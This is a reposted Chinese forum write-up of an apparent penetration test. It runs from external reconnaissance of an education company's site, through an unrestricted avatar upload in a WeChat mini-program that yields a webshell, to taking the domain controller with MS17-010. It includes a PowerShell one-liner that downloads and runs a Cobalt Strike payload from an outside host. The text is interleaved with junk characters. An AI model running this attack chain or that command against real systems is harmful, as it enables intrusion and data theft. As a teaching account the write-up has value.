|
. Z. r) {$ p3 E) Y: y 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
/ [. @. {% @' ]2 L
5 s% P5 ?$ x& d' |2 r1 W9 h* d6 ~$ D% X. B# p
: H6 ?% F3 X1 Z8 n' E# P9 e, x4 _
/ X0 U/ \% P/ q
% `. b4 U. {# m/ C2 C- Y 正文7 m8 `6 N, x8 b, V( F! T+ U0 A' h. b
( N: y8 Q+ ^# f& x2 t+ B( O* F
1 j5 Z& u$ _/ x' Y/ P 7 j8 F3 r$ h. T8 [3 E) i
( A' T3 {8 g# F% E, y
' K. F' K5 g" b
目标:www.xxxx.com(一家教育机构) , C7 | @' Y# h. S# s+ I
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
; A8 \/ o4 B0 U# D
3 Z* `+ b6 B6 @4 g- V3 W9 H4 U8 d/ h; j" n! q, ^, A1 S9 R
6 B7 z' ~" Y/ I
& i5 E! f( V. m$ |. \9 F3 ^; V# {! _# F4 x2 {' }
进行了简单的信息搜集 " A3 y9 Q2 [0 F8 Z$ j* m# {
7 f* w. G) a0 \! n9 J2 Q
d# w+ `* b. s2 A5 a/ x + x1 \( M' h7 _& W
2 _& d0 ?/ Z8 R' j- o5 R
子域名搜集: M9 m, G& j& ?( a
7 r7 G' S( V3 f2 U& v: z
6 F9 A8 g: t: ^; d" q" l
* V4 } N) I# {# O; v y% c$ e0 j4 f0 x$ z$ P& a4 A
1 m( _) i9 K- T" `# g fofa找资产
/ r% r! Z Z" w9 ~! U% K: \9 T
0 k# {: B) [' l; @% b4 g: t, {
' u; o9 ~; R9 g/ p
2 v/ u5 Z" a# Y: n; E% G2 R! B6 c% Q
- o' P* q( o4 A' I- o- G) j( q* N- g
0 Z1 ^' J% u- I3 i! E / S, [& W7 i/ V: |! H
; a5 U4 P6 y$ B
一共七个资产。去重之后只有两个。 5 U# w1 ^2 j" j8 U
" P: u2 g0 Q! ~5 H" p* n2 \2 N) Q% V- E! T' V5 v6 j# Q/ F
' L* G! n7 f' e2 }3 Y
9 Y# z) {. d2 c$ ^ D/ M& L
目录探测/ E1 M! b, j' }3 x* U, c/ M
4 e. G" w9 [4 ~; a/ Z5 j
8 g1 N) G/ L5 R8 I
; y3 O% d- @3 @) X: Y ' a' Y5 B9 V. ]; H- M w9 P
+ X# i8 H' s( x, Y. v& ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 * w5 R) q& ^, h" }. L
0 Q8 U+ `# k4 F* z
+ q2 z; v' O8 l5 o1 l1 Y7 i
0 u5 l2 H4 p7 f: q- F+ @3 O0 X- ~( f& {8 ^( M, M
我又尝试了通过修改返回包来绕过登录界面9 ~0 l, I( {; A6 X: B
\) k+ a$ u3 D; Z4 E
& b, e4 A1 e# z9 Q2 d8 Z) t' m& U+ V/ u 8 p3 Z- R/ @! ]. R% _# Q2 N4 J
' K0 t* t3 L3 E
: k4 ?# A* s" Z* z! S8 @ 还是不行,尝试注入无果
w$ _( ^2 S" Y9 k0 r
- v4 d; e% s8 L- _1 w/ A$ a9 ?) L. v( Z0 o R \6 l- H( V$ |' I
. `, a! F- F1 d5 Y; R3 I o0 d
7 d/ W: [" i# Q& c4 M% \
! _) y( R7 U: Y' |4 i 不过我目录探测出了一处Spring信息泄露 3 J, A) d$ _! x+ U- X
- `* ?% l/ S8 X8 W
2 r; U5 J2 K0 _6 @1 g5 ^8 H4 u # |- {0 {" j8 ^4 j& Z; P* D# Z1 h" T
+ y$ t4 ~' k) o3 R
0 ?$ F& U% C: a
$ M) N B* B; \" ?
6 l: }6 ^" a$ H% h$ ~8 _. T
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
4 \* T4 y. u- o+ g' Z, [: C . ~! f: y5 g6 }7 W
/ {( n9 f! w1 {' Q
& t F9 K p2 z- q
e+ p% |5 ?7 ~( V2 l" U7 q# }& L, d9 l5 q* n; {1 C7 Q6 y9 Z0 l
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 I& H/ i% s" j" b3 o" j& P
3 N- j; y* g8 I9 y' g' F2 a$ A
. x# B1 W1 W+ V* \0 ^# m5 b
* c6 J% t/ \5 O# N
4 i9 t, Y/ K' H1 y C* q/ P3 y& b, l6 K% ]& j
获取有些师傅到这一步就手机抓包电脑测了。1 |; i7 V2 l$ L# _: ~+ T
! R) |( R2 Q$ w" [- H
) Z6 r! o9 p u Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。; p) N# ` F, v! O* |( g
- W5 E9 N, g9 @& A( m9 q: Z) M' X4 V0 I! Q( s7 R. X* m
其中在一个公众号发现了小程序,可以进行注册。
5 @ C* a5 j5 _: g5 w! b
& K" H7 a L/ H8 F6 o3 G% B4 M3 _0 N. m
看到了头像上传,尝试上传获取WebShell
- t& L0 `8 i( g
! B/ \4 p; D ^& \% n0 r: G# P" f, d% l& F% ~4 s- ~
% f1 F2 ~+ Z) u; p5 y- F U/ D
r; S% E( M' w/ a
. W4 A+ F& l; | 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
# P. V- |) Y% O5 Q: f; V. G7 c/ B8 j
8 Y0 e* j6 v! G9 T
/ P# q3 n: n) a. w
4 i0 J) Y3 C( e t7 q
2 C! E( [3 M7 L8 V, S0 m, C5 N! J/ r+ `; V
然后上了大马
* {& n& z, i# c2 `2 i ) t, r. `1 }$ Q3 D! Q+ [3 u+ h
5 Y* V, i( v" N x# c" P" n2 O ^
# k6 i% {3 d7 r" ~ 4 m* \5 y4 O k. r
, K8 g& Z* O, X0 S( ~
1 f- Q' Y" z4 T) ?/ U! u7 i
* `% P }# f/ B$ U; X! S
8 E" ?: S+ C7 b& D" t3 z0 T, M 通过翻找文件发现数据库账号密码
! l ^. p' |. f6 a# W & ]6 {2 T3 L7 C) o) Y4 _
2 W8 t6 f) Q+ T
1 b& C/ E9 I! `8 P . ~5 ^" k9 T6 \6 ?/ E" Z1 m8 `
* R. r4 i# R' Q' M: k7 P --内网渗透
+ Y$ ^. p* _$ }; @ 5 n5 y) g1 a1 z2 r0 \# L
6 U3 w& P; R, F( b! `0 U 直接通过powershell执行 cs上线
( e0 q: C' F) |. F
" e6 E9 Q$ K* `# N0 j5 n0 F' x8 t5 m+ B' K1 K( z8 P4 l
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# |% B9 f- @. V* _' [& g6 m : n3 C0 {, r1 H9 ~( t
1 Y! G+ w: H1 F- U6 S5 P 3 b5 V; t# t+ @$ f" W' P" G
2 U' p9 ~+ W5 m1 l. n; I' {$ f
9 [. _- C4 `, l; c( C 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
0 K/ A3 \, J& g2 E ; j' K0 W# X7 a- z- \, n
* S9 _" q: Y& l
- z) B$ p5 G F
7 h9 \4 ?7 P1 H- g: G6 f
7 W# Y8 A1 [4 X. C4 X2 |, U4 t 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; Q$ x* `; z, C& J* {0 I) j 8 ?# R A: \; s" W! E- Z
8 ?# ~( l' P( x" q# V: h7 v5 {1 `
# U( x+ z: y% o. T : @" {$ K4 d# |2 K9 ?
& b c8 u o5 b4 x% M+ f 7 y4 j( J! P# p! | a
( T1 h1 n! A1 a( U9 l$ a
5 D$ f' ?: G. I# o! {0 i" d% k
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 0 ]4 U1 j) N4 r1 `3 L5 L$ Z9 N
# [4 |- ` V6 U# Z! G
3 M6 W( r5 f( K" ]( G
" d7 d7 Y K. F- e- q5 q" A
2 Y6 y0 a" U( F0 \
- N" p) Q5 b+ G( m8 a+ @ ) H8 a$ w8 ]1 o- j$ i% g' P9 x5 E
: b) l5 v3 C! u$ J9 |' P' @2 U1 Z
S! f' S8 ~! a6 L
( Z- k2 O* D1 l- R, Z$ \
; d; Z) N) G! B* M! Y- F$ Z , V; `( R7 J, K
% X* Y9 B; L. Z) h. i; h* s
- }6 \) ^! p1 X+ W+ a5 e' c
) V1 \2 R2 [ @
) M' C& o9 ?/ i- H! Q" \. f' q- |, } 小结$ c0 f( q* @7 N z/ g
6 u5 Y2 C( C8 s/ a: w
2 s+ f R" u, z# T# n4 n
3 z* E: _* J6 ?( N0 \' D: i
6 m; ^. L! k* s8 H1 p0 M3 R5 q: G" `" H+ r# J. N
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!! T8 w" E% ], @. l# D/ b
$ _* S2 H6 N0 f+ r- Y) l0 m. J6 |
. t1 f* |% A. Z4 |, o3 y) i* A , U: d3 ^5 l# g/ `- T/ g7 z/ ~0 A
% Z O! \$ T+ S+ y8 g
$ r( w) ?. b: C: C; F- n -
$ o( K* L* X' E v( v9 [
A7 v+ G' z+ g# U1 E* r& q
4 s/ a0 I' h! o1 h" ~
- ' f. i( n" S' w6 m9 M
+ \! |8 [% U7 B; b) ^& L
5 q, T" p k; p# L, x
* v$ t+ N# n1 F3 Y3 z& X
2 h0 y4 D* J4 ]- u, ~- G 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
! m' m) x e* R; {5 b- d2 P1 e% X9 H* s; S
- u, I% N+ k% L" ]+ k
4 u) { ?; n3 u x' N1 j9 L0 y R. e' R% U& F, |* Y- L4 J
|